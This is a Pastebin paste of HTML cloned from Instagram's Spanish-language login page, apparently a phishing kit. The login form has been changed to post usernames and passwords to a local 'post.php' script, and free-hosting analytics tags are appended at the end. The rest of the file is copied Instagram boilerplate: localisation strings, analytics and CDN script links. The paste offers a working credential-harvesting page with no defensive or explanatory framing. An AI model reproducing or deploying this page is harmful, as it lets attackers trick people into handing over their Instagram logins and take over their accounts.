Advertisement
HYDRA4

HTML for instagram login page

Apr 28th, 2016
2,809
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 11.15 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html xmlns="http://www.w3.org/1999/xhtml" lang="es" class="hl-es not-logged-in ">
  3. <head>
  4.     <meta charset="UTF-8" />
  5.     <title>Log in &mdash; Instagram</title>
  6.  
  7.     <meta name="robots" content="noimageindex" />
  8.  
  9.     <link rel="Shortcut Icon" type="image/x-icon" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/favicon.ico" />
  10.  
  11.     <meta name="apple-mobile-web-app-capable" content="yes" />
  12.     <meta name="apple-mobile-web-app-status-bar-style" content="black" />
  13.  
  14.     <link rel="apple-touch-icon-precomposed" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/apple-touch-icon-precomposed.png" />
  15.     <link rel="apple-touch-icon-precomposed" sizes="72x72" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/apple-touch-icon-72x72-precomposed.png" />
  16.     <link rel="apple-touch-icon-precomposed" sizes="114x114" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/apple-touch-icon-114x114-precomposed.png" />
  17.     <link rel="apple-touch-icon-precomposed" sizes="144x144" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/apple-touch-icon-144x144-precomposed.png" />
  18.  
  19.    
  20.     <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0" />
  21.    
  22.  
  23.    
  24.         <script type="text/javascript" src="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/scripts/jquery.js"></script>
  25.         <script type="text/javascript" src="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/scripts/bluebar.js"></script>
  26.  
  27.    
  28.  
  29.    
  30.  
  31.     <meta id="viewport" name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width">
  32.  
  33. <script type="text/javascript">
  34.     $(document).ready(function() {
  35.         $("#id_username").focus();
  36.         setTimeout(function() {
  37.             document.getElementById('viewport').setAttribute('content', 'width='+ window.innerWidth + ', user-scalable=no');
  38.         }, 5);
  39.     });
  40. </script>
  41.  
  42.  
  43.    
  44.     <link rel="stylesheet" type="text/css" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/cache/distillery/dialog-main.css"/>
  45.     <!--[if lt IE 9]>
  46.    <style>
  47.        .dialog-outer {
  48.            min-height: 0;
  49.        }
  50.    </style>
  51.    <![endif]-->
  52.  
  53.  
  54. </head>
  55. <body class="p-dialog oauth-login">
  56.  
  57.  
  58. <div class="root">
  59.  
  60. <section class="dialog-outer">
  61.     <div class="dialog">
  62.  
  63.         <header>
  64.             <h1 class="logo">Instagram</h1>
  65.            
  66.         </header>
  67.  
  68.        
  69.        
  70.        
  71.  
  72.         <div class="dialog-main">
  73.            
  74.  
  75.  
  76.             <form method="POST" id="login-form" class="adjacent" action="post.php">
  77.                 <input type="hidden" name="csrfmiddlewaretoken" value="e8aa2707f5c13e8a02ff5df8e9487537"/>
  78.                 <p><label for="id_username">Username:</label> <input name="username" maxlength="30" autocapitalize="off" autocorrect="off" type="text" id="username" /></p>
  79. <p><label for="id_password">password:</label> <input autocapitalize="off" autocorrect="off" type="password" name="password" id="password" /></p>
  80.                 <p class="form-actions">
  81.                     <a href="/accounts/password/reset/">have you forgotten your password?</a>
  82.                     <input type="submit" class="button-green" value="Log in" />
  83.                 </p>
  84.             </form>
  85.         </div>
  86.  
  87.     </div>
  88. </section>
  89.  
  90. <script>
  91.     $(window).load(
  92.         function() {
  93.             $("#id_username").focus();
  94.         }
  95.     );
  96. </script>
  97.  
  98. <div id="reactModalMountPoint"></div>
  99. </div> <!-- .root -->
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106.  
  107.  
  108.  
  109. <script type="text/javascript">
  110.     var _gaq = _gaq || [];
  111.     _gaq.push(['_setAccount', 'UA-18105282-1']);
  112.     _gaq.push(['_setDomainName', 'none']);
  113.     _gaq.push(['_setAllowLinker', true]);
  114.     _gaq.push(["_set", "title", "Login"]);
  115.     _gaq.push(["_setCustomVar", 1, "page", "Login", 3]);
  116.  
  117.     _gaq.push(['_trackPageview']);
  118.     (function() {
  119.         var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  120.         ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  121.         var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  122.     })();
  123. </script>
  124.  
  125.         <script type="text/javascript">
  126. window._strings = {
  127.  
  128. "%(count)s comments": "%(count)s comments",
  129. "%(count)s followers": "%(count)s followers",
  130. "%(count)s following": "%(count)s following",
  131. "%(count)s likes": "%(count)s likes",
  132. "%(count)s more comments": "%(count)s more comments",
  133. "%(count)s new posts": "%(count)s new posts",
  134. "%(count)s people liked this photo": "%(count)s people liked this photo",
  135. "%(count)s photos,": "%(count)s photos,",
  136. "%(count)s posts": "%(count)s posts",
  137. "%(count)s+ new posts": "%(count)s+ new posts",
  138. "%(day)s %(month_name)s %(year)s": "%(day)s %(month_name)s %(year)s",
  139. "%(days)s days ago": "hace %(days)s d&#65533;as",
  140. "%(days)sd": "%(days)sd",
  141. "%(followerCount)s followers": "%(followerCount)s followers",
  142. "%(hours)s hours ago": "hace %(hours)s horas",
  143. "%(hours)sh": "%(hours)sh",
  144. "%(likes)s likes, %(comments)s comments": "%(likes)s likes, %(comments)s comments",
  145. "%(mediaCount)s photos": "%(mediaCount)s photos",
  146. "%(minutes)s minutes ago": "hace %(minutes)s minutos",
  147. "%(minutes)sm": "%(minutes)sm",
  148. "%(months)s months ago": "hace %(months)s meses",
  149. "%(seconds)s seconds ago": "hace %(seconds)s segundos",
  150. "%(seconds)ss": "%(seconds)ss",
  151. "%(user)s on Instagram": "%(user)s on Instagram",
  152. "%(username)s on Instagram": "%(username)s on Instagram",
  153. "%(weeks)s weeks ago": "hace %(weeks)s semanas",
  154. "%(weeks)sw": "%(weeks)ssem",
  155. "%(year)s %(month)s": "%(year)s %(month)s",
  156. "1": "1",
  157. "1 comment": "1 comment",
  158. "1 day ago": "Hace 1 d&#65533;a",
  159. "1 follower": "1 follower",
  160. "1 hour ago": "Hace 1 hora",
  161. "1 like": "1 like",
  162. "1 minute ago": "Hace un minuto",
  163. "1 month ago": "Hace 1 mes",
  164. "1 more comment": "1 more comment",
  165. "1 new post": "1 new post",
  166. "1 photo>": "1 photo\u003E",
  167. "1 second ago": "Hace 1 segundo",
  168. "1 week ago": "Hace 1 semana",
  169. "2": "2",
  170. "3": "3",
  171. "AM": "AM",
  172. "About us": "Acerca de",
  173. "Account Insights - Instagram": "Account Insights \u002D Instagram",
  174. "Add a caption...": "Add a caption...",
  175. "Add a comment": "Add a comment",
  176. "All items loaded": "All items loaded",
  177. "Apr": "Apr",
  178. "April": "Abril",
  179. "Are you sure you want to delete this comment?": "Are you sure you want to delete this comment?",
  180. "Are you sure?": "Are you sure?",
  181. "Audience": "Audience",
  182. "Aug": "Aug",
  183. "August": "Agosto",
  184. "Badges": "Insignias",
  185. "Blog": "Blog",
  186. "By using this embed, you agree to Instagram\\'s <a href=\"http://instagram.com/about/legal/terms/api/\">API Terms of Use</a>.": "By using this embed, you agree to Instagram\u005C\u0027s \u003Ca href\u003D\u0022http://instagram.com/about/legal/terms/api/\u0022\u003EAPI Terms of Use\u003C/a\u003E.",
  187. "Cancel": "Cancelar",
  188. "Content unavailable": "Content unavailable",
  189. "Copy Embed Code": "Copy Embed Code",
  190. "Copy this code:": "Copy this code:",
  191. "Couldn\\'t post comment": "Couldn\u005C\u0027t post comment",
  192. "Dec": "Dec",
  193. "December": "Diciembre",
  194. "Delete": "Eliminar",
  195. "Edit Profile": "Editar el perfil",
  196. "Embed": "Embed",
  197. "Feb": "Feb",
  198. "February": "Febrero",
  199. "Follow": "Seguir",
  200. "Follow %(username)s on Instagram": "Follow %(username)s on Instagram",
  201. "Follow friends and interesting people to see their photos here.": "Follow friends and interesting people to see their photos here.",
  202. "Following": "Eres seguidor(a)",
  203. "Forgot your password?": "Forgot your password?",
  204. "Fri": "Fri",
  205. "Friday": "Friday",
  206. "Here are some suggestions.": "Here are some suggestions.",
  207. "Home": "Inicio",
  208. "Jan": "Jan",
  209. "January": "Enero",
  210. "Jobs": "Empleo",
  211. "Jul": "Jul",
  212. "July": "Julio",
  213. "Jun": "Jun",
  214. "June": "Junio",
  215. "Leave a comment...": "Leave a comment...",
  216. "Like": "Me gusta",
  217. "Likes": "Me gusta",
  218. "Load More...": "Load More...",
  219. "Load more": "Load more",
  220. "Load more...": "Load more...",
  221. "Loading more...": "Loading more...",
  222. "Loading...": "Loading...",
  223. "Log Out": "Salir",
  224. "Log in": "Log in",
  225. "Mar": "Mar",
  226. "March": "Marzo",
  227. "May": "Mayo",
  228. "Mon": "Mon",
  229. "Monday": "Monday",
  230. "More": "More",
  231. "Next photo": "Next photo",
  232. "No Recent Photos": "No Recent Photos",
  233. "No likes yet.": "A&#65533;n no tiene ning&#65533;n \u0022Me gusta\u0022.",
  234. "No photos to show.": "No photos to show.",
  235. "Nov": "Nov",
  236. "November": "Noviembre",
  237. "Now": "Now",
  238. "Oct": "Oct",
  239. "October": "Octubre",
  240. "Open in App": "Abrir en la aplicaci&#65533;n",
  241. "Others": "Others",
  242. "PM": "PM",
  243. "Password:": "Password:",
  244. "Paste it on your website, blog, or wherever you want to link to your profile!": "Paste it on your website, blog, or wherever you want to link to your profile!",
  245. "People you follow": "People you follow",
  246. "Performance": "Performance",
  247. "Photo by %(username)s": "Foto de %(username)s",
  248. "Posts": "Posts",
  249. "Press": "Prensa",
  250. "Press Page - Instagram": "Press Page \u002D Instagram",
  251. "Previous Posts": "Previous Posts",
  252. "Previous photo": "Previous photo",
  253. "Privacy": "Privacidad",
  254. "Report inappropriate": "Report inappropriate",
  255. "Requested": "Solicitud pendiente de aprobaci&#65533;n",
  256. "Retry": "Retry",
  257. "Sat": "Sat",
  258. "Saturday": "Saturday",
  259. "Select your badge:": "Select your badge:",
  260. "Sep": "Sep",
  261. "September": "Septiembre",
  262. "Summary": "Summary",
  263. "Sun": "Sun",
  264. "Sunday": "Sunday",
  265. "Support": "Ayuda",
  266. "Terms": "Condiciones",
  267. "This user is private": "Este username es privado",
  268. "Thu": "Thu",
  269. "Thursday": "Thursday",
  270. "To follow %(username)s, you need to log in.": "To follow %(username)s, you need to log in.",
  271. "Toggle like": "Toggle like",
  272. "Tue": "Tue",
  273. "Tuesday": "Tuesday",
  274. "Username:": "Username:",
  275. "Video by %(username)s": "Video by %(username)s",
  276. "View Photo Page": "View Photo Page",
  277. "View Profile": "Perfil",
  278. "View Video Page": "View Video Page",
  279. "View on Instagram": "View on Instagram",
  280. "Wed": "Wed",
  281. "Wednesday": "Wednesday",
  282. "When you are finished following people,": "When you are finished following people,",
  283. "Write a comment...": "Write a comment...",
  284. "Yes": "S&#65533;",
  285. "You must log in to add a comment.": "You must log in to add a comment.",
  286. "You must log in to like this photo.": "You must log in to like this photo.",
  287. "You need to be following %(username)s to like or comment": "Debes seguir a %(username)s para comentar o darle a Me gusta",
  288. "Your username or password was incorrect.": "Your username or password was incorrect.",
  289. "am": "am",
  290. "banner photo": "banner photo",
  291. "nd": "nd",
  292. "pm": "pm",
  293. "rd": "rd",
  294. "reload this page": "reload this page",
  295. "st": "st",
  296. "th": "th"
  297. };
  298. </script>
  299.         <script type="text/javascript">window._sharedData = {"entry_data":{},"hostname":"instagram.com","config":{"csrf_token":"e8aa2707f5c13e8a02ff5df8e9487537"},"static_root":"\/\/d36xtkk24g8jdx.cloudfront.net\/bluebar\/07d0b7a"};</script>
  300. <script src="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/cache/bundles/webpack-common.js"></script>
  301.  
  302.  
  303. </body>
  304. </html>
  305. <!-- Hosting24 Analytics Code -->
  306. <script type="text/javascript" src="http://stats.hosting24.com/count.php"></script>
  307. <!-- End Of Analytics Code -->
  308.  
  309.  
  310. <!-- Hosting24 Analytics Code -->
  311. <script type="text/javascript" src="http://stats.hosting24.com/count.php"></script>
  312. <!-- End Of Analytics Code -->
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement